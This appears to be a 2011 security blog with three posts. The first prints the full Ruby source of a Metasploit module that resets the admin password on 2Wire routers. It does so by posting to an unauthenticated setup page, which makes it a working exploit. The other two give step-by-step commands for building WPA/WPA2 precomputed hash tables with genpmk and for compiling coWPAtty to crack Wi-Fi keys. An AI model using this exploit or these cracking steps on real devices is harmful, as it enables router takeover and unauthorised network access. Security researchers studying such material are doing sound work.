Wednesday, June 22, 2011

Metasploit module to reset admin password on 2wire wireless routers.

UPDATE: This module is now a part of metasploit. just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here

Here is a metaploit module I coded to reset the password on a 2wire router. It uses a setup wizard page that doesn't verify if the user is authenticated nor remove itself after first time setup. This can be exploited to reset the password. Without further delay, here is the code.

on my ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

=====================================================
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => '2Wire Password Reset',
'Version' => '$Revision: 1 $',
'Description' => %Q{
This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard
page that fails to check if a user is authenicated and doesn't remove or block after first access.
},
'Author' => 'Travis Phillips',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])
], self.class)

end

def run
begin
print_status("Attempting to rest password to #{datastore['PASSWORD']} on #{rhost}\n")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/xslt',
'data' => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
}, 25)
if (res.code == 200)
if (res.headers['Set-Cookie'])
print_status("Password reset successful!\n")
end
end
end
end
end
=====================================================

Saturday, June 18, 2011

How to Generate Rainbow Tables for Cowpatty using genpmk to crack WPA/WPA2

Over the past few days I've had people ask me how to generate rainbow tables for Cowpatty. It's quite simple. Just a few things you should know first:

- Each table is for ONE ESSID. In WPA/WPA2, the SSID of the network is used as a salt to the encryption.

- You will want to find a good password dictionary file. I recommend the Renderlab church of wifi's password list found here.

- Passwords MUST be over 8 characters in length. So if you have a password list, weed out any smaller passwords.

And on with the show. Let's first look at the help screen.

genpmk 1.1 - WPA-PSK precomputation attack.
genpmk: Must specify a dictionary file with -f
Usage: genpmk [options]

-f Dictionary file
-d Output hash file
-s Network SSID
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

After precomputing the hash file, run cowpatty with the -d argument.

So, to generate a rainbow table we need to provide a dictionary, an SSID, and a output file for it to write the hashes. so using the above we can do the following

genpmk -f final-wordlist.txt -s HackMe -d HackMe

This will make it create a Rainbow table called "HackMe" which will contain hashes of all the passwords in the file "final-wordlist.txt" salted with the SSID "HackMe". The output of the shell should update as every 1,000 hashes are created.

The whole process isn't actually all that bad for time and the file size for a rainbow table using the password file I suggest is ~40 MB. Not to bad considering the speed boost it will give when you go to crack it.

Patch, Compile, and Installing coWPAtty 4.6 on Ubuntu

Cowpatty is a great tool for cracking WPA/WPA2 keys via either a dictionary attack or via rainbow tables. All it needs to see it a client connect to the network (this is called a "handshake"). However cowpatty isn't perfect and has a problem with reading handshakes incorrectly. After looking into this I found a way to install it with the patch on my Ubuntu box.

First we need to download the required files. If you already have them you can skip them.

sudo apt-get install build-essential
sudo apt-get install libssl-dev
sudo apt-get install libpcap0.8-dev
sudo apt-get install libdigest-hmac-perl

Next Download cowpatty 4.6

wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz

you should get b90fd36ad987c99e7cc1d2a05a565cbd as the MD5 sum. If so, extract and move into the directory using the following

tar -xvf cowpatty-4.6.tgz
cd cowpatty-4.6

Next we need to download the patch and patch the source code.

wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
patch < cowpatty-4.6-fixup16.patch

Next we will compile and install it and then test it

make
sudo make install
cd ..
cowpatty

If all goes well you should see the cowpatty help menu:

cowpatty 4.6 - WPA-PSK dictionary attack.
cowpatty: Must supply a pcap file with -r

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

Now if you're as lazy as me. Here's everything together to work as a script

#/bin/bash
echo -e "\n \e[1;31m[*] Installing build-essential\e[0m"
sudo apt-get -y install build-essential
echo -e "\n \e[1;34m[*] Installing libssl-dev\e[0m"
sudo apt-get -y install libssl-dev
echo -e "\n \e[1;34m[*] Installing libpcap0.8-dev\e[0m"
sudo apt-get -y install libpcap0.8-dev
echo -e "\n \e[1;34m[*] Installing libdigest-hmac-perl\e[0m"
sudo apt-get -y install libdigest-hmac-perl
echo -e "\n \e[1;34m[*] Downloading cowpatty-4.6.tgz\e[0m"
wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz
echo "\e[1;34mMD5 SHOULD BE b90fd36ad987c99e7cc1d2a05a565cbd\e[0m"
echo -e "\n \e[1;34m[*] Extracting cowpatty-4.6.tgz\e[0m"
tar -xvf cowpatty-4.6.tgz > /dev/null
cd cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Downloading Cowpatty Patch\e[0m"
wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Patching Cowpatty code"
patch < cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Compiling Cowpatty\e[0m"
make
echo -e "\n \e[1;34m[*] Installing cowpatty to system\e[0m"
sudo make install
echo -e "\n \e[1;34m[*] Removing Cowpatty Directory\e[0m"
cd .. > /dev/null
rm -r -f cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Removing cowpatty-4.6.tgz\e[0m"
rm cowpatty-4.6.tgz > /dev/null
echo -e "\n \e[1;34m[*] testing to see if cowpatty works\e[0m"
cowpatty
echo -e "\n \e[1;34m[*] Done!\e[0m"


Links:

http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz - Get coWPAtty here
http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch - Patch to fix several issues with cowpatty
http://www.renderlab.net/projects/WPA-tables/ - A place to get 33GB of Rainbow tables for free download.